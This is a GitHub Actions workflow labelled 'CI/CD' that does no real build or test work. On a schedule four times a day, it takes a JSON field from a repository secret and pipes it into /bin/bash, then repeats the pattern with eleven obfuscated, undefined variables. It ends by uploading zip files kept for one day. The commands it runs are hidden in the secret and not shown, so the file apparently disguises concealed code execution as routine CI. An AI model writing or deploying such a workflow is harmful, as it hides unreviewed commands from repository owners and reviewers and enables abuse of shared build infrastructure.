name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '46 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          oulmx43: ${{ secrets.oulmx43 }}
        run: |
          printf '%s' "$oulmx43" | jq -r .ohn36 | /bin/bash
          echo $pl31993 | jq -r .m755 | /bin/bash
          echo $lyz94 | jq -r .v1 | /bin/bash
          printf '%s' "$i717" | jq -r .zm808 | /bin/bash
          printf '%s' "$oe8293" | jq -r .ehgl088 | /bin/bash
          echo $riwf7259 | jq -r .nplp1 | /bin/bash
          printf '%s' "$doo4" | jq -r .cdt37887 | /bin/bash
          echo $py04 | jq -r .wvxm6121 | /bin/bash
          echo $i94428 | jq -r .mlpht87 | /bin/bash
          printf '%s' "$ngboq111" | jq -r .lo8449 | /bin/bash
          printf '%s' "$p0" | jq -r .rauo8 | /bin/bash
          printf '%s' "$rosz488" | jq -r .pekv1186 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: rok4qaVC
          path: "*.zip"
          retention-days: 1
